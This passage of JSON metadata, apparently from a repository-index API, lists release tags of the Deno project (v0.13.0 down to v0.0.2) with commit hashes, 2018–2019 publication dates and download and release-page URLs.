:"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0